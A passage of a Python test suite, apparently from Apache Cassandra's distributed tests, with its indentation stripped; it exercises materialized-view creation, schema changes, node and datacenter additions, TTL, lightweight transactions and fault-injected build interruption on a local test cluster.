session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))
rows = 100
views = 5
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_keyspace(session)
self._assert_view_meta(session, views, exists=False)
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_views(session, views)
self._assert_view_meta(session, views, exists=False)
def test_create(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting 1 materialized view == got" + str(result)
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
# But can alter the gc_grace_seconds of the bease table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def test_insert(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
assert len(result) == 2, "Expecting {} users, got {}".format(2 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
assert len(result) == 1, "Expecting {} users, got {}".format(1 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
assert len(result) == 0, "Expecting {} users, got {}".format(0 == len(result))
def test_populate_mv_after_insert(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
"""Test that a view is OK when created with existing data with wide rows"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
for i in range(5):
for j in range(10000):
session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(5):
for j in range(10000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))
result = list(session.execute(selectPrepared.bind(['TX'])))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute(selectPrepared.bind(['CA'])))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
result = list(session.execute(selectPrepared.bind(['MA'])))
assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 2, "Expecting {} materialized view, got {}".format(2, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_drop_column(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state on base table with materialized views."
)
def test_drop_table(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 0, "Expecting {} materialized view, got {}".format(1, len(result))
def test_clustering_column(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
session.cluster.control_connection.wait_for_schema_agreement()
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
def _add_dc_after_mv_test(self, rf, nts):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
logger.debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Writing 1k to base")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Reading 1k from view")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Reading 1k from base")
for i in range(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
logger.debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
logger.debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
if nts:
session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
node4.nodetool('rebuild dc1')
node5.nodetool('rebuild dc1')
cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)
logger.debug("Verifying data from new node in view")
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Inserting 100 into base")
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Verify 100 in view")
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1, False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1}, True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
"""
@jira_ticket CASSANDRA-12984
Assert that MVs are marked as build after bootstrap. Otherwise newly streamed MVs will be built again
"""
assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_insert_during_range_movement_rf1(self):
self._base_test_insert_during_range_movement(rf=1)
def test_insert_during_range_movement_rf2(self):
self._base_test_insert_during_range_movement(rf=2)
def test_insert_during_range_movement_rf3(self):
self._base_test_insert_during_range_movement(rf=3)
def _base_test_insert_during_range_movement(self, rf):
"""
@jira_ticket CASSANDRA-14251
Test that materialized views replication work in the middle of a join
for different replication factors.
"""
session = self.prepare(rf=rf)
logger.debug("Creating table and view")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Starting new node4 in write survey mode")
node4 = new_node(self.cluster, data_center="dc1")
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
"-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug("Insert data while node4 is joining")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Finish joining node4")
node4.nodetool("join")
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug("Verify data")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(10):
for j in range(100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(10):
for j in range(100):
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100):
if j % 10 == 0:
session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(i, j, j + 2))
self.cluster.flush()
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j))
assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100, 110):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(10):
for j in range(110):
if j < 100 and (j % 10 == 0 or (j - 1) % 10 == 0):
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with very wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(5):
for j in range(5000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(5):
for j in range(5000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(5):
for j in range(5000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(5):
for j in range(5100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(5):
for j in range(5100):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_allow_filtering(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def test_secondary_index(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def test_ttl(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in range(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
rows = list(session.execute("SELECT * FROM t_by_v2"))
assert len(rows) == 0, "Expected 0 rows but got {}".format(len(rows))
def test_query_all_new_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'first_name'), 'Column "first_name" not found'
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def test_query_new_column(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert not hasattr(results[0], 'first_name'), 'Column "first_name" found in view'
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def test_rename_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when renaming a column
@expected_result The column is also renamed in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users RENAME username TO user")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'user'), 'Column "user" not found'
assert_one(
session,
"SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f']
)
def test_rename_column_atomicity(self):
"""
Test that column renaming is atomically done between a table and its materialized views
@jira_ticket CASSANDRA-12952
"""
session = self.prepare(nodes=1, user_table=True, install_byteman=True)
node = self.cluster.nodelist()[0]
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
# Rename a column with an injected byteman rule to kill the node after the first schema update
self.fixture_dtest_setup.allow_log_errors = True
script_version = '4x' if self.cluster.version() >= '4' else '3x'
node.byteman_submit(['./byteman/merge_schema_failure_{}.btm'.format(script_version)])
with pytest.raises(NoHostAvailable):
session.execute("ALTER TABLE users RENAME username TO user")
logger.debug('Restarting node')
node.stop()
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
# Both the table and its view should have the new schema after restart
assert_one(
session,
"SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
)
assert_one(
session,
"SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
def test_lwt(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Inserting initial data using IF NOT EXISTS")
for i in range(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
self._replay_batchlogs()
logger.debug("All rows should have been inserted")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in range(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("No rows should have changed")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Update the 10 first rows with a different value")
for i in range(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 1000
for i in range(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
logger.debug("Deleting the first 10 rows")
for i in range(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 990
for i in range(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def test_interrupt_build_process(self):
"""Test that an interrupted MV build process is resumed as it should"""
options = {'hinted_handoff_enabled': False}
if self.cluster.version() >= '4':
options['concurrent_materialized_view_builders'] = 4
session = self.prepare(options=options, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
logger.debug("Avoid premature MV build finalization with byteman")
for node in self.cluster.nodelist():
if self.cluster.version() >= '4':
node.byteman_submit(['./byteman/4.0/skip_view_build_finalization.btm'])
node.byteman_submit(['./byteman/4.0/skip_view_build_task_finalization.btm'])
else:
node.byteman_submit(['./byteman/pre4.0/skip_finish_view_build_status.btm'])
node.byteman_submit(['./byteman/pre4.0/skip_view_build_update_distributed.btm'])
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
